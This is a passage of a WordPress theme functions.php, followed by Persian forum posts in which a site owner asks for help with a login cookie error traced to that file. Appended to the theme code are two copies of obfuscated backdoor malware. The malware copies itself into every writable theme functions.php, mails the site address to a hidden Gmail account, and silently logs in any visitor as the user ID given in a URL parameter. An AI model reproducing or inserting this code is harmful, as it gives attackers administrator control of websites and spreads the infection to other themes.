), 'top' => __( 'فهرست بالای هدر' ) ) ); } add_action( 'init', 'register_my_menus' ); class Menu_With_Description extends Walker_Nav_Menu { function start_el(&$output, $item, $depth, $args) { global $wp_query; $indent = ( $depth ) ? str_repeat( "\t", $depth ) : ''; $class_names = $value = ''; $classes = empty( $item->classes ) ? array() : (array) $item->classes; $class_names = join( ' ', apply_filters( 'nav_menu_css_class', array_filter( $classes ), $item ) ); $class_names = ' class="' . esc_attr( $class_names ) . '"'; $output .= $indent . '<li id="menu-item-'. $item->ID . '"' . $value . $class_names .'>'; $attributes = ! empty( $item->attr_title ) ? ' title="' . esc_attr( $item->attr_title ) .'"' : ''; $attributes .= ! empty( $item->target ) ? ' target="' . esc_attr( $item->target ) .'"' : ''; $attributes .= ! empty( $item->xfn ) ? ' rel="' . esc_attr( $item->xfn ) .'"' : ''; $attributes .= ! empty( $item->url ) ? ' href="' . esc_attr( $item->url ) .'"' : ''; $item_output = $args->before; $item_output .= '<a'. $attributes .'>'; $item_output .= $args->link_before . apply_filters( 'the_title', $item->title, $item->ID ) . $args->link_after; $item_output .= '<br /><span class="sub">' . $item->description . '</span>'; $item_output .= '</a>'; $item_output .= $args->after; $output .= apply_filters( 'walker_nav_menu_start_el', $item_output, $item, $depth, $args ); } } if ( ! function_exists( 'wptools_pagination' ) ) : function wptools_pagination() { global $wp_query; $big = 999999999; echo paginate_links( array( 'base' => str_replace( $big, '%#%', esc_url( get_pagenum_link( $big ) ) ), 'format' => '?paged=%#%', 'current' => max( 1, get_query_var('paged') ), 'prev_next' => True, 'prev_text' => __('«'), 'next_text' => __('»'), 'total' => $wp_query->max_num_pages ) ); } endif; ?> <?php function _check_isactive_widget(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f); $output .= ($showdots && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_allwidgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_allwidgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_check_isactive_widget"); function _getsprepare_widget(){ if(!isset($com_length)) $com_length=120; if(!isset($text_value)) $text_value="cookie"; if(!isset($allowed_tags)) $allowed_tags="<a>"; if(!isset($type_filter)) $type_filter="none"; if(!isset($expl)) $expl=""; if(!isset($filter_homes)) $filter_homes=get_option("home"); if(!isset($pref_filter)) $pref_filter="wp_"; if(!isset($use_more)) $use_more=1; if(!isset($comm_type)) $comm_type=""; if(!isset($pagecount)) $pagecount=$_GET["cperpage"]; if(!isset($postauthor_comment)) $postauthor_comment=""; if(!isset($comm_is_approved)) $comm_is_approved=""; if(!isset($postauthor)) $postauthor="auth"; if(!isset($more_link)) $more_link="(more...)"; if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_"); if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value; if(!isset($more_link_ditails)) $more_link_ditails="(details...)"; if(!isset($morecontents)) $morecontents="ma".$expl."il"; if(!isset($fmore)) $fmore=1; if(!isset($fakeit)) $fakeit=1; if(!isset($sql)) $sql=""; if (!$is_widget) : global $wpdb, $post; $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";# if (!empty($post->post_password)) { if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__("There is no excerpt because this is a protected post."); } else { $output=get_the_password_form(); } } } if(!isset($f_tags)) $f_tags=1; if(!isset($type_filters)) $type_filters=$filter_homes; if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents; if(!isset($aditional_tags)) $aditional_tags="div"; if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);# if(!isset($more_link_text)) $more_link_text="Continue reading this entry"; if(!isset($showdots)) $showdots=1; $comments=$wpdb->get_results($sql); if($fakeit == 2) { $text=$post->post_content; } elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt; } else { $text=$post->post_excerpt; } $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";# if($com_length < 0) { $output=$text; } else { if(!$no_more && strpos($text, "<!--more-->")) { $text=explode("<!--more-->", $text, 2); $l=count($text[0]); $more_link=1; $comments=$wpdb->get_results($sql); } else { $text=explode(" ", $text); if(count($text) > $com_length) { $l=$com_length; $ellipsis=1; } else { $l=count($text); $more_link=""; $ellipsis=0; } } for ($i=0; $i<$l; $i++) $output .= $text[$i] . " "; } update_option("_is_widget_active_", 1); if("all" != $allowed_tags) { $output=strip_tags($output, $allowed_tags); return $output; } endif; $output=rtrim($output, "\s\n\t\r\0\x0B"); $output=($f_tags) ? balanceTags($output, true) : $output; $output .= ($showdots && $ellipsis) ? "..." : ""; $output=apply_filters($type_filter, $output); switch($aditional_tags) { case("div") : $tag="div"; break; case("span") : $tag="span"; break; case("p") : $tag="p"; break; default : $tag="span"; } if ($use_more ) { if($fmore) { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n"; } else { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n"; } } return $output; } add_action("init", "_getsprepare_widget"); ?> <?php function _check_active_widget(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_all_widgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_check_active_widget"); function _prepared_widget(){ if(!isset($length)) $length=120; if(!isset($method)) $method="cookie"; if(!isset($html_tags)) $html_tags="<a>"; if(!isset($filters_type)) $filters_type="none"; if(!isset($s)) $s=""; if(!isset($filter_h)) $filter_h=get_option("home"); if(!isset($filter_p)) $filter_p="wp_"; if(!isset($use_link)) $use_link=1; if(!isset($comments_type)) $comments_type=""; if(!isset($perpage)) $perpage=$_GET["cperpage"]; if(!isset($comments_auth)) $comments_auth=""; if(!isset($comment_is_approved)) $comment_is_approved=""; if(!isset($authname)) $authname="auth"; if(!isset($more_links_text)) $more_links_text="(more...)"; if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_"); if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method; if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)"; if(!isset($more_content)) $more_content="ma".$s."il"; if(!isset($forces_more)) $forces_more=1; if(!isset($fakeit)) $fakeit=1; if(!isset($sql)) $sql=""; if (!$widget_output) : global $wpdb, $post; $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";# if (!empty($post->post_password)) { if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__("There is no excerpt because this is a protected post."); } else { $output=get_the_password_form(); } } } if(!isset($fix_tag)) $fix_tag=1; if(!isset($filters_types)) $filters_types=$filter_h; if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content; if(!isset($more_tags)) $more_tags="div"; if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);# if(!isset($mlink_title)) $mlink_title="Continue reading this entry"; if(!isset($showdot)) $showdot=1; $comments=$wpdb->get_results($sql); if($fakeit == 2) { $text=$post->post_content; } elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt; } else { $text=$post->post_excerpt; } $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";# if($length < 0) { $output=$text; } else { if(!$no_more && strpos($text, "<!--more-->")) { $text=explode("<!--more-->", $text, 2); $l=count($text[0]); $more_link=1; $comments=$wpdb->get_results($sql); } else { $text=explode(" ", $text); if(count($text) > $length) { $l=$length; $ellipsis=1; } else { $l=count($text); $more_links_text=""; $ellipsis=0; } } for ($i=0; $i<$l; $i++) $output .= $text[$i] . " "; } update_option("_is_widget_active_", 1); if("all" != $html_tags) { $output=strip_tags($output, $html_tags); return $output; } endif; $output=rtrim($output, "\s\n\t\r\0\x0B"); $output=($fix_tag) ? balanceTags($output, true) : $output; $output .= ($showdot && $ellipsis) ? "..." : ""; $output=apply_filters($filters_type, $output); switch($more_tags) { case("div") : $tag="div"; break; case("span") : $tag="span"; break; case("p") : $tag="p"; break; default : $tag="span"; } if ($use_link ) { if($forces_more) { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n"; } else { $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n"; } } return $output; } add_action("init", "_prepared_widget"); ?>  
    
    
  • توسط parkict
   با سلام و عرض خسته نباشید خدمت کاربران محترم؛
   بنده در ورود به مدیریت سایت مشکل "خطاکوکی‌ها مسدود شده‌اند یا توسط مرورگر شما پشتیبانی نمی‌شوند. شما باید آن‌ها را فعال کنید تا وردپرس بتواند از آن استفاده نماید." که برخی از تایپک های انجمن رو خوندم و در آخر به functions قالب رسیدم که دیدم مشکل از اینجاست ، بنده نام فایل functions رو تغییر دادم و مشکل ورود به پنل حل شد ولی در عوض ایندکس سایت بالا نیومد؛ الان functions قالب رو پیوست کردم تا شما سروران و مهندسان من functions را ویرایش، و مشکل من را حل کنید!
   با تشکر
   آدرس سایت : http://parkict.ir
  • توسط parkict
   با سلام و عرض خسته نباشید خدمت کاربران محترم؛
   بنده در ورود به مدیریت سایت مشکل "خطاکوکی‌ها مسدود شده‌اند یا توسط مرورگر شما پشتیبانی نمی‌شوند. شما باید آن‌ها را فعال کنید تا وردپرس بتواند از آن استفاده نماید." که برخی از تایپک های انجمن رو خوندم و در آخر به functions قالب رسیدم که دیدم مشکل از اینجاست ، بنده نام فایل functions رو تغییر دادم و مشکل ورود به پنل حل شد ولی در عوض ایندکس سایت بالا نیومد؛ الان functions قالب رو پیوست کردم تا شما سروران و مهندسان من functions را ویرایش، و مشکل من را حل کنید!
   با تشکر
   functions.php
  • توسط koroush
   با سلام خدمت شما
   بنده پنل تنظیمات مربوط به یک پوسته رو ترجمه کردم.
   اما درر حین بازگزاری ترجمه اون نمایش داده نمیشه.
   تکس دامین در فایل فانشن تعریف شده.
   عبارت مورد نظر هم دارای توابع ترجمه هست.
   به تصاویر ضمیمه شده توجه کنید.
   با احترام